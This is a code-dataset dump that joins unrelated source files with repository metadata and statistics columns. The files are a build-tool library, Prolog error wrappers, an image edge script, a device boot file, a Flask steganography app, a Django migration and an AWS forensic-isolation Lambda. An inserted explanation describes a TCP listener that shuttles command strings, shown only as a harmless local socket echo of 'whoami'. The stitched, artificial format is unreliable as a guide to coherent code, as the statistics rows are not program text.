my_listener.run() | 25.625 | 70 | 0.734146 | 114 | 820 | 5.166667 | 0.561404 | 0.061121 | 0.047538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02276 | 0.142683 | 820 | 32 | 71 | 25.625 | 0.815078 | 0.170732 | 0 | 0 | 0 | 0 | 0.107829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.05 | null | null | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
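The listener blocks on `accept()` and then shuttles command strings over a TCP stream. A minimal sketch of the same send/recv round-trip using `socket.socketpair()`, so it runs in one process without a network peer (the command text here is illustrative):

```python
import socket

# a connected pair of sockets stands in for the listener and its client
server, client = socket.socketpair()

# Python 3 sockets carry bytes, so strings are encoded before send
# and decoded after recv
client.sendall("whoami".encode())
command = server.recv(1024).decode()
server.sendall(("you ran: " + command).encode())
reply = client.recv(1024).decode()
print(reply)  # → you ran: whoami

server.close()
client.close()
```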
bec6becd26fa525cff31dffaad9d3ab5e8f46f15 | 11,873 | py | Python | lib/fbuild/builders/__init__.py | felix-lang/fbuild | 9595fbfd6d3ceece31fda2f96c35d4a241f0129b | [
"PSF-2.0",
"BSD-2-Clause"
] | 40 | 2015-02-07T00:44:12.000Z | 2021-04-02T13:41:08.000Z | lib/fbuild/builders/__init__.py | felix-lang/fbuild | 9595fbfd6d3ceece31fda2f96c35d4a241f0129b | [
"PSF-2.0",
"BSD-2-Clause"
] | 30 | 2015-02-06T17:45:15.000Z | 2019-01-10T16:34:29.000Z | lib/fbuild/builders/__init__.py | felix-lang/fbuild | 9595fbfd6d3ceece31fda2f96c35d4a241f0129b | [
"PSF-2.0",
"BSD-2-Clause"
] | 3 | 2015-09-03T06:38:02.000Z | 2019-10-24T14:26:57.000Z | import abc
import contextlib
import os
import sys
from functools import partial
from itertools import chain
import fbuild
import fbuild.db
import fbuild.path
import fbuild.temp
from . import platform
# ------------------------------------------------------------------------------
class MissingProgram(fbuild.ConfigFailed):
def __init__(self, programs=None):
self.programs = programs
def __str__(self):
if self.programs is None:
return 'cannot find program'
else:
return 'cannot find any of the programs %s' % \
' '.join(repr(str(p)) for p in self.programs)
# ------------------------------------------------------------------------------
@fbuild.db.caches
def find_program(ctx, names, paths=None, *, quieter=0):
"""L{find_program} is a test that searches the paths for one of the
programs in I{name}. If one is found, it is returned. If not, the next
name in the list is searched for."""
if paths is None:
paths = os.environ['PATH'].split(os.pathsep)
# If we're running on windows, we need to append '.exe' to the filenames
# that we're searching for.
if sys.platform == 'win32':
new_names = []
for name in names:
if \
not name.endswith('.exe') or \
not name.endswith('.cmd') or \
not name.endswith('.bat'):
new_names.append(name + '.exe')
new_names.append(name + '.cmd')
new_names.append(name + '.bat')
new_names.append(name)
names = new_names
for name in names:
filename = fbuild.path.Path(name)
ctx.logger.check('looking for ' + filename.name, verbose=quieter)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(name)
else:
for path in paths:
filename = fbuild.path.Path(path, name)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(filename)
ctx.logger.failed(verbose=quieter)
raise MissingProgram(names)
# ------------------------------------------------------------------------------
def check_version(ctx, builder, version_function, *,
requires_version=None,
requires_at_least_version=None,
requires_at_most_version=None):
"""Helper function to simplify checking the version of a builder."""
if any(v is not None for v in (
requires_version,
requires_at_least_version,
requires_at_most_version)):
ctx.logger.check('checking %s version' % builder)
version_str = version_function()
# Convert the version into a tuple
version = []
for i in version_str.split('.'):
try:
version.append(int(i))
except ValueError:
# The subversion isn't a number, so just convert it to a
# string.
version.append(i)
version = tuple(version)
if requires_version is not None and requires_version != version:
msg = 'version %s required; found %s' % (
'.'.join(str(i) for i in requires_version), version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_least_version is not None and \
requires_at_least_version > version:
msg = 'at least version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_least_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_most_version is not None and \
requires_at_most_version < version:
msg = 'at most version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_most_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
ctx.logger.passed(version_str)
# ------------------------------------------------------------------------------
class AbstractCompiler(fbuild.db.PersistentObject):
def __init__(self, *args, src_suffix, **kwargs):
super().__init__(*args, **kwargs)
self.src_suffix = src_suffix
@fbuild.db.cachemethod
def compile(self, src:fbuild.db.SRC, *args, **kwargs) -> fbuild.db.DST:
return self.uncached_compile(src, *args, **kwargs)
@abc.abstractmethod
def uncached_compile(self, src, *args, **kwargs):
pass
@fbuild.db.cachemethod
@platform.auto_platform_options()
def build_objects(self, srcs:fbuild.db.SRCS, *args, **kwargs) -> \
fbuild.db.DSTS:
"""Compile all of the passed in L{srcs} in parallel."""
# When a object has extra external dependencies, such as .c files
# depending on .h changes, depending on library changes, we need to add
# the dependencies in build_objects. Unfortunately, the db doesn't
# know about these new files and so it can't tell when a function
# really needs to be rerun. So, we'll just not cache this function.
# We need to add extra dependencies to our call.
objs = []
src_deps = []
dst_deps = []
for o, s, d in self.ctx.scheduler.map(
partial(self.compile.call, *args, **kwargs),
srcs):
objs.append(o)
src_deps.extend(s)
dst_deps.extend(d)
self.ctx.db.add_external_dependencies_to_call(
srcs=src_deps,
dsts=dst_deps)
return objs
# --------------------------------------------------------------------------
def tempfile(self, code):
return fbuild.temp.tempfile(code, self.src_suffix)
@contextlib.contextmanager
def tempfile_compile(self, code='', *, quieter=1, **kwargs):
with self.tempfile(code) as src:
yield self.uncached_compile(src, quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_compile(self, *args, **kwargs):
try:
with self.tempfile_compile(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_compile(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_compile(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractLibLinker(AbstractCompiler):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_lib(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into a library and caches the results."""
return self.uncached_link_lib(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_lib(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_lib(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into a library."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_lib(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_lib(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_lib(dst, [obj], quieter=quieter, **kwargs)
def try_link_lib(self, *args, **kwargs):
try:
with self.tempfile_link_lib(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
def check_link_lib(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_lib(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractRunner(fbuild.db.PersistentObject):
@abc.abstractmethod
def tempfile_run(self, *args, **kwargs):
pass
def try_run(self, code='', quieter=1, **kwargs):
try:
self.tempfile_run(code, quieter=quieter, **kwargs)
except fbuild.ExecutionError:
return False
else:
return True
def check_run(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_run(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractExeLinker(AbstractCompiler, AbstractRunner):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_exe(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into an executable."""
return self.uncached_link_exe(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_exe(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_exe(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into an executable."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_exe(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_exe(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_exe(dst, [obj], quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_link_exe(self, *args, **kwargs):
try:
with self.tempfile_link_exe(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_link_exe(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_exe(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
@platform.auto_platform_options()
def tempfile_run(self, *args, quieter=1, ckwargs={}, lkwargs={}, **kwargs):
with self.tempfile_link_exe(*args,
quieter=quieter,
ckwargs=ckwargs,
**lkwargs) as exe:
return self.ctx.execute([exe],
quieter=quieter,
cwd=exe.parent,
**kwargs)
# ------------------------------------------------------------------------------
class AbstractCompilerBuilder(AbstractLibLinker, AbstractExeLinker):
pass
| 35.762048 | 80 | 0.553609 | 1,326 | 11,873 | 4.831825 | 0.156863 | 0.035898 | 0.037459 | 0.05057 | 0.536288 | 0.482285 | 0.461058 | 0.437334 | 0.418136 | 0.376151 | 0 | 0.000925 | 0.271456 | 11,873 | 331 | 81 | 35.870091 | 0.739769 | 0.166596 | 0 | 0.422594 | 0 | 0 | 0.024862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117155 | false | 0.050209 | 0.046025 | 0.008368 | 0.305439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bec81857d7e4af0801337540f4b978497c5536f9 | 1,897 | py | Python | tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 55609415102f8116165a42c8e33e029c4906e160 | [
"Apache-2.0"
] | 1 | 2021-08-07T06:29:28.000Z | 2021-08-07T06:29:28.000Z | tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 55609415102f8116165a42c8e33e029c4906e160 | [
"Apache-2.0"
] | 14 | 2021-09-16T13:25:12.000Z | 2022-01-03T10:12:22.000Z | tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 55609415102f8116165a42c8e33e029c4906e160 | [
"Apache-2.0"
] | 1 | 2021-12-22T00:25:32.000Z | 2021-12-22T00:25:32.000Z | from typing import Union
from tuprolog import logger
# noinspection PyUnresolvedReferences
import jpype.imports
# noinspection PyUnresolvedReferences
import it.unibo.tuprolog.solve.exception.error as errors
from tuprolog.core import Term, Atom
from tuprolog.solve import ExecutionContext, Signature
ExistenceError = errors.ExistenceError
ObjectType = ExistenceError.ObjectType
OBJECT_PROCEDURE = ObjectType.PROCEDURE
OBJECT_SOURCE_SINK = ObjectType.SOURCE_SINK
OBJECT_RESOURCE = ObjectType.RESOURCE
OBJECT_STREAM = ObjectType.STREAM
OBJECT_OOP_ALIAS = ObjectType.OOP_ALIAS
OBJECT_OOP_METHOD = ObjectType.OOP_METHOD
OBJECT_OOP_CONSTRUCTOR = ObjectType.OOP_CONSTRUCTOR
OBJECT_OOP_PROPERTY = ObjectType.OOP_PROPERTY
def existence_error(
context: ExecutionContext,
type: ObjectType,
culprit: Term,
message: str
) -> ExistenceError:
return ExistenceError.of(context, type, culprit, message)
def existence_error_for_source_sink(
context: ExecutionContext,
alias: Union[Atom, str]
) -> ExistenceError:
return ExistenceError.forSourceSink(context, alias)
def existence_error_for_procedure(
context: ExecutionContext,
procedure: Signature
) -> ExistenceError:
return ExistenceError.forProcedure(context, procedure)
def existence_error_for_stream(
context: ExecutionContext,
stream: Term
) -> ExistenceError:
return ExistenceError.forStream(context, stream)
def existence_error_for_resource(
context: ExecutionContext,
name: str
) -> ExistenceError:
return ExistenceError.forResource(context, name)
def object_type(name: Union[str, Term]) -> ObjectType:
if isinstance(name, str):
return ObjectType.of(name)
else:
return ObjectType.fromTerm(name)
logger.debug("Loaded JVM classes from it.unibo.tuprolog.solve.exception.error.ExistenceError.*")
| 24.960526 | 96 | 0.765946 | 200 | 1,897 | 7.1 | 0.29 | 0.042254 | 0.059859 | 0.056338 | 0.047887 | 0.047887 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163416 | 1,897 | 75 | 97 | 25.293333 | 0.89477 | 0.037428 | 0 | 0.204082 | 0 | 0 | 0.043884 | 0.030719 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122449 | false | 0 | 0.122449 | 0.102041 | 0.387755 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
fe2070ac8557cbd4275cc5e584c79388af700674 | 2,510 | py | Python | detection/contor.py | chika626/chainer_rep | a1d4fd32a8cfcab753269455d08c1918f273388d | [
"MIT"
] | null | null | null | detection/contor.py | chika626/chainer_rep | a1d4fd32a8cfcab753269455d08c1918f273388d | [
"MIT"
] | 7 | 2020-03-13T08:29:46.000Z | 2020-05-27T17:34:14.000Z | detection/contor.py | chika626/chainer_rep | a1d4fd32a8cfcab753269455d08c1918f273388d | [
"MIT"
] | null | null | null | import json
import math
from PIL import Image,ImageDraw
import pandas as pd
import glob
import argparse
import copy
import numpy as np
import matplotlib.pyplot as plt
import pickle
import cv2
from PIL import ImageEnhance
import chainer
from chainer.datasets import ConcatenatedDataset
from chainer.datasets import TransformDataset
from chainer.optimizer_hooks import WeightDecay
from chainer import serializers
from chainer import training
from chainer.training import extensions
from chainer.training import triggers
from chainercv.datasets import voc_bbox_label_names
from chainercv.datasets import VOCBboxDataset
from chainercv.extensions import DetectionVOCEvaluator
from chainercv.links.model.ssd import GradientScaling
from chainercv.links.model.ssd import multibox_loss
from chainercv.links import SSD300
from chainercv.links import SSD512
from chainercv import transforms
from chainercv.utils import read_image
from chainercv.links.model.ssd import random_crop_with_bbox_constraints
from chainercv.links.model.ssd import random_distort
from chainercv.links.model.ssd import resize_with_random_interpolation
import queue
def run(img):
    # PIL's Image.size is (width, height)
    H, W = img.size
    img = np.asarray(img)
    # output image for the transformed data, initialised to white below
    transed = Image.new('RGB', (H, W))
for x in range(H):
for y in range(W):
transed.putpixel((x,y),(255,255,255))
for x in range(H):
for y in range(W):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y][x+1][0]:
transed.putpixel((x,y),(0,0,0))
for y in range(W):
for x in range(H):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y+1][x][0]:
transed.putpixel((x,y),(0,0,0))
return transed
def main():
    # # single-image version of the pipeline
# img = Image.open('cont/transed/X.jpg')
# img=img.convert('L')
# img=np.asarray(img)
# ret2, img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)
# img=Image.fromarray(img)
# img=img.convert('RGB')
# transed = run(img)
# transed.save('transec_0.png')
# return
    # batch converter: process every cropped image
img_path=glob.glob("cont/crop/*")
counter=0
for path in img_path:
img = Image.open(path)
transed = run(img)
transed.save('transec_{}.png'.format(counter))
counter+=1
if __name__ == '__main__':
main() | 26.989247 | 72 | 0.640239 | 348 | 2,510 | 4.54023 | 0.298851 | 0.098734 | 0.079747 | 0.072785 | 0.255063 | 0.248101 | 0.139241 | 0.091139 | 0.064557 | 0.064557 | 0 | 0.022605 | 0.259761 | 2,510 | 93 | 73 | 26.989247 | 0.827772 | 0.114343 | 0 | 0.190476 | 0 | 0 | 0.017005 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0 | 0.52381 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
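`run()` marks a pixel whenever its right or bottom neighbour differs in the red channel. The same idea over a plain 2D grid (a hypothetical `edge_pixels` helper; unlike `run()`, it bounds-checks each neighbour instead of breaking at the border):

```python
def edge_pixels(grid):
    # mark a pixel whenever its right or bottom neighbour holds a
    # different value — the same criterion as the two scans in run()
    h, w = len(grid), len(grid[0])
    edges = set()
    for y in range(h):
        for x in range(w):
            if x + 1 < w and grid[y][x] != grid[y][x + 1]:
                edges.add((x, y))
            if y + 1 < h and grid[y][x] != grid[y + 1][x]:
                edges.add((x, y))
    return edges

grid = [[0, 0, 1],
        [0, 0, 1],
        [1, 1, 1]]
print(sorted(edge_pixels(grid)))  # → [(0, 1), (1, 0), (1, 1)]
```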
fe21f2c89737b3c4d120cba724974597cb079bc4 | 1,675 | py | Python | src/boot.py | johngtrs/krux | 7b6c6d410e29c16ab5d3c05a5aafab618f13a86f | [
"MIT"
] | null | null | null | src/boot.py | johngtrs/krux | 7b6c6d410e29c16ab5d3c05a5aafab618f13a86f | [
"MIT"
] | null | null | null | src/boot.py | johngtrs/krux | 7b6c6d410e29c16ab5d3c05a5aafab618f13a86f | [
"MIT"
] | null | null | null | # The MIT License (MIT)
# Copyright (c) 2021 Tom J. Sun
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import machine
from pmu import axp192
from context import Context
from login import Login
from home import Home
import settings
pmu = axp192()
# Enable power management so that if power button is held down 6 secs,
# it shuts off as expected
pmu.enablePMICSleepMode(True)
ctx = Context()
ctx.display.flash_text(settings.load('splash', 'Krux', strip=False))
while True:
    if not Login(ctx).run():
        break
    if not Home(ctx).run():
        break
ctx.display.flash_text('Shutting down..')
ctx.clear()
pmu.setEnterSleepMode()
machine.reset()
| 32.211538 | 79 | 0.755224 | 254 | 1,675 | 4.972441 | 0.543307 | 0.069675 | 0.020586 | 0.030087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007971 | 0.176119 | 1,675 | 51 | 80 | 32.843137 | 0.907246 | 0.696119 | 0 | 0.105263 | 0 | 0 | 0.051125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.315789 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fe2900b93b3b942d3363b1695eb5a7b3920a90d6 | 1,913 | py | Python | app.py | Nishanth-Gobi/Da-Vinci-Code | b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a | [
"MIT"
] | null | null | null | app.py | Nishanth-Gobi/Da-Vinci-Code | b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a | [
"MIT"
] | null | null | null | app.py | Nishanth-Gobi/Da-Vinci-Code | b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request, redirect, url_for
from os.path import join
from stego import Steganography
app = Flask(__name__)
UPLOAD_FOLDER = 'static/files/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}
@app.route("/")
def home():
    return render_template('home.html')


@app.route("/encrypt", methods=['GET', 'POST'])
def get_image():
    if request.method == 'GET':
        return render_template('encrypt.html')
    # Check if the user has entered the secret message
    if 'file' in request.files and 'Secret' in request.values:
        uploaded_image = request.files['file']
        message = request.values.get('Secret')
        password = request.values.get("key")
        filepath = join(app.config['UPLOAD_FOLDER'], "cover_image.png")
        uploaded_image.save(filepath)
        im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password)
        im.encode(message=message)
        return render_template('encrypt.html', value=filepath, image_flag=True, secret_flag=True)
    return redirect(url_for('get_image'))


@app.route("/decrypt", methods=['GET', 'POST'])
def get_image_to_decrypt():
    if request.method == 'GET':
        return render_template('decrypt.html')
    if 'key' in request.values:
        password = request.values.get('key')
        filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png")
        im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password)
        message = im.decode()
        return render_template('decrypt.html', value=filepath, message=message)
    if 'file' in request.files:
        uploaded_image = request.files['file']
        filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png")
        uploaded_image.save(filepath)
        return render_template('decrypt.html', value=filepath)


if __name__ == '__main__':
    app.run(debug=True)
| 31.360656 | 97 | 0.67747 | 239 | 1,913 | 5.242678 | 0.276151 | 0.076616 | 0.071828 | 0.100559 | 0.579409 | 0.490822 | 0.361532 | 0.230646 | 0.230646 | 0.09577 | 0 | 0 | 0.182436 | 1,913 | 60 | 98 | 31.883333 | 0.801151 | 0.025091 | 0 | 0.243902 | 0 | 0 | 0.163178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0.097561 | 0.073171 | 0.02439 | 0.317073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fe2b48a6665b98787ac1bd205fe634201bd2120e | 1,480 | py | Python | job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py | Sruthi-Ganesh/postgres-django-queue | 4ea8412c073ff8ceb0efbac48afc29456ae11346 | [
"Apache-2.0"
] | null | null | null | job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py | Sruthi-Ganesh/postgres-django-queue | 4ea8412c073ff8ceb0efbac48afc29456ae11346 | [
"Apache-2.0"
] | null | null | null | job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py | Sruthi-Ganesh/postgres-django-queue | 4ea8412c073ff8ceb0efbac48afc29456ae11346 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 2.2.4 on 2019-08-21 19:53
# this file is auto-generated so don't do flake8 on it
# flake8: noqa
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
import django.utils.timezone
def copy_date_done_to_date_created(apps, schema_editor):
    TaskResult = apps.get_model('django_celery_results', 'taskresult')
    db_alias = schema_editor.connection.alias
    TaskResult.objects.using(db_alias).all().update(
        date_created=models.F('date_done')
    )


def reverse_copy_date_done_to_date_created(app, schema_editor):
    # the reverse of 'copy_date_done_to_date_created' is to do nothing,
    # because the 'date_created' field will be removed.
    pass


class Migration(migrations.Migration):

    dependencies = [
        ('django_celery_results', '0005_taskresult_worker'),
    ]

    operations = [
        migrations.AddField(
            model_name='taskresult',
            name='date_created',
            field=models.DateTimeField(
                auto_now_add=True,
                db_index=True,
                default=django.utils.timezone.now,
                help_text='Datetime field when the task result was created in UTC',
                verbose_name='Created DateTime'
            ),
            preserve_default=False,
        ),
        migrations.RunPython(copy_date_done_to_date_created,
                             reverse_copy_date_done_to_date_created),
    ]
| 30.204082 | 83 | 0.664189 | 183 | 1,480 | 5.065574 | 0.519126 | 0.09493 | 0.064725 | 0.075512 | 0.149946 | 0.149946 | 0.06904 | 0 | 0 | 0 | 0 | 0.019838 | 0.250676 | 1,480 | 48 | 84 | 30.833333 | 0.816051 | 0.161486 | 0 | 0.064516 | 1 | 0 | 0.141815 | 0.051864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0.032258 | 0.096774 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3002f8ab77d8668df51f08f7789bc9628e8c1f | 2,370 | py | Python | EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py | spartantri/aws-security-automation | a3904931220111022d12e71a3d79e4a85fc82173 | [
"Apache-2.0"
] | null | null | null | EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py | spartantri/aws-security-automation | a3904931220111022d12e71a3d79e4a85fc82173 | [
"Apache-2.0"
] | null | null | null | EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py | spartantri/aws-security-automation | a3904931220111022d12e71a3d79e4a85fc82173 | [
"Apache-2.0"
] | null | null | null | # MIT No Attribution
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import boto3
import os
def lambda_handler(event, context):
    # TODO implement
    print(event)
    client = boto3.client('ec2')
    instanceID = event.get('instanceID')
    response = client.describe_instances(
        InstanceIds=[
            instanceID
        ]
    )
    volumeID = response['Reservations'][0]['Instances'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeId']
    print(volumeID)
    SnapShotDetails = client.create_snapshot(
        Description='Isolated Instance',
        VolumeId=volumeID
    )
    client.create_tags(Resources=[SnapShotDetails['SnapshotId']], Tags=[{'Key': 'Name', 'Value': instanceID}])
    # TODO Dump Response into S3 - response
    # TODO Dump Response details into Snapshot - SnapShotDetails['SnapshotId']
    print(response)
    print(SnapShotDetails['SnapshotId'])
    response = client.modify_instance_attribute(
        Groups=[
            os.environ['ISOLATED_SECUTRITYGROUP'],
        ],
        InstanceId=instanceID
    )
    tagresponse = client.create_tags(
        Resources=[
            instanceID,
        ],
        Tags=[
            {
                'Key': 'IsIsolated',
                'Value': 'InstanceIsolated'
            },
        ]
    )
    waiter = client.get_waiter('snapshot_completed')
    waiter.wait(
        SnapshotIds=[
            SnapShotDetails['SnapshotId'],
        ]
    )
    # event['SnapshotId'] = SnapShotDetails['SnapshotId']
    return SnapShotDetails['SnapshotId']
